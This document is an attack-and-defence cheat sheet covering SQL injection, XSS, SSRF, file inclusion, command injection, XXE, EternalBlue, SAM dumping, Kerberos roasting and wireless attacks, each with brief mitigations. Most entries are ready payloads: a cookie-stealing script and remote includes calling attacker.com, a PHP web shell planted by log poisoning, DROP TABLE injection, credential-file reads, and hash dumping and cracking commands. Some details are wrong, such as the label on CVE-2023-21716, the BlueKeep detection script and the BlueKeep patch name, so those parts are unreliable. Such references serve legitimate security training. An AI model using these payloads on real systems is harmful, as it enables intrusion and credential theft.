Common Vulnerabilities Reference

Web Vulnerabilities

SQL Injection (SQLi)

Severity: Critical | OWASP: A03:2021

Types:

• In-band (union, error-based)
• Blind (boolean, time-based)
• Stacked queries

Detection:

# Manual test
' OR '1'='1
" OR "1"="1
' OR 1=1--
' AND 1=2--

# Automated
sqlmap -u "http://target/?id=1" --batch --dbs

Exploitation:

' UNION SELECT NULL--
' UNION SELECT table_name FROM information_schema.tables--
' UNION SELECT username,password FROM users--
'; DROP TABLE users;--

Mitigation: Parameterized queries, stored procedures, input validation, least privilege

---

Cross-Site Scripting (XSS)

Severity: High | OWASP: A03:2021

Types:

• Reflected: URL param reflected in response
• Stored: Malicious script saved in database
• DOM-based: Client-side JavaScript modifies DOM

Detection:

'"><script>alert(1)</script>
<img src=x onerror=alert(1)>
<svg onload=alert(1)>

Exploitation (Cookie Theft):

<script>new Image().src="http://attacker.com/?c="+document.cookie</script>

Mitigation: Input validation, output encoding, Content-Security-Policy, HttpOnly cookies

---

Server-Side Request Forgery (SSRF)

Severity: High | OWASP: A10:2021

Detection:

http://localhost/
http://127.0.0.1:80/
http://169.254.169.254/latest/meta-data/  # AWS metadata

Exploitation:

# Port scan internal network
http://target/?url=http://10.0.0.5:22
http://target/?url=http://10.0.0.5:3306

# Read local files
http://target/?url=file:///etc/passwd

# Cloud metadata
http://target/?url=http://169.254.169.254/latest/user-data/

Mitigation: URL validation, block private IP ranges, disable unnecessary protocols

---

Local File Inclusion (LFI) / Remote File Inclusion (RFI)

Severity: High | OWASP: A03:2021

LFI Detection:

../../etc/passwd
..%252f..%252f..%252fetc/passwd
/proc/self/environ
/proc/net/tcp

LFI → RCE (Log Poisoning):

# Inject PHP into Apache log
curl "http://target" -A "<?php system(\$_GET['cmd']); ?>"

# Access via LFI
http://target/page.php?file=../../var/log/apache2/access.log&cmd=whoami

RFI Detection:

# If allow_url_include is ON
http://target/page.php?file=http://attacker.com/shell.txt

Mitigation: Disable allow_url_include, whitelist allowed files, realpath() validation

---

Command Injection

Severity: Critical

Detection:

; whoami
| whoami
& whoami
&& whoami
|| whoami
$(whoami)
`whoami`

Bypass:

# Space bypass
cat${IFS}/etc/passwd
cat</etc/passwd

# Encoding
echo "test"
echo%20"test"

Mitigation: Input validation, whitelist allowed characters, use language APIs instead of system()

---

XML External Entity (XXE)

Severity: High | OWASP: A05:2021

Detection:

<?xml version="1.0"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<foo>&xxe;</foo>

Blind XXE:

<?xml version="1.0"?>
<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://attacker.com/evil.dtd">]>
%xxe;

Mitigation: Disable XML external entities (libxml2, Java), use JSON where possible

---

Network Vulnerabilities

EternalBlue (MS17-010)

Severity: Critical | CVE: CVE-2017-0144

Affected: Windows Vista, 7, 8.1, 10, Server 2008-2016

Detection:

nmap --script=smb-vuln-ms17-010 10.0.0.5

Exploitation:

# Metasploit
use exploit/windows/smb/ms17_010_eternalblue

# Manual
# https://github.com/0x09AL/CVE-2017-0144-Win-7-Code-Execution

Mitigation: MS17-010 patch, disable SMBv1, firewall rules

---

BlueKeep (CVE-2019-0708)

Severity: Critical

Affected: Windows 7, Server 2008 R2, XP

Detection:

nmap -p 3389 --script=rdp-vuln-ms12-020 10.0.0.5

Mitigation: MS19-040 patch, enable NLA, firewall restrict RDP

---

SAM Database Security

Severity: High

NTLM Hashes stored:

Username:rid:LM_hash:NTLM_hash:::

Dump:

# Local
reg save HKLM\SAM sam.save
reg save HKLM\SYSTEM system.save

# Remote (with admin)
python3 secretsdump.py domain/user:pass@target

Crack:

hashcat -m 1000 hashes.txt wordlist.txt
john --format=nt hashes.txt --wordlist=wordlist.txt

Mitigation: Enable Secure Boot, BitLocker, restrict registry access

---

Authentication Vulnerabilities

Kerberoasting

Severity: High

Technique: Request TGS for service account, crack offline

Detection (defensive):

• Monitor 4769 events (TGS request) without corresponding 4768
• Alert on service account TGS requests from workstations

Mitigation: Strong service account passwords, least privilege, audit SPNs

---

AS-REP Roasting

Severity: High

Technique: Users without pre-auth can have AS-REP ticket captured and cracked

Detection: Look for 4768 (AS-REQ) from non-DC sources

Mitigation: Enable Kerberos pre-authentication

---

Wireless Vulnerabilities

WPA2-PSK Weak Password

Severity: Medium-High

Attack: Capture handshake, brute force offline

Mitigation: Use 16+ character random passphrase, WPA3

---

Evil Twin

Severity: Medium

Attack: Fake AP intercepts connections, captures credentials

Mitigation: Verify AP MAC, avoid auto-connect to open networks, use HTTPS

---

Vulnerability Databases

CVE	Description	Severity
CVE-2017-0144	EternalBlue (SMB)	Critical
CVE-2019-0708	BlueKeep (RDP)	Critical
CVE-2022-0847	DirtyPipe (Linux kernel)	High
CVE-2021-34527	PrintNightmare (Windows)	Critical
CVE-2021-26855	ProxyLogon (Exchange)	Critical
CVE-2022-30190	Follina (MSDT)	High
CVE-2023-21716	NTLM Relay (Windows)	High

Severity Ratings

Rating	CVSS Score	Example
Critical	9.0-10.0	RCE, complete system compromise
High	7.0-8.9	Privesc, data exfiltration
Medium	4.0-6.9	Information disclosure, DoS
Low	0.1-3.9	Minor information leaks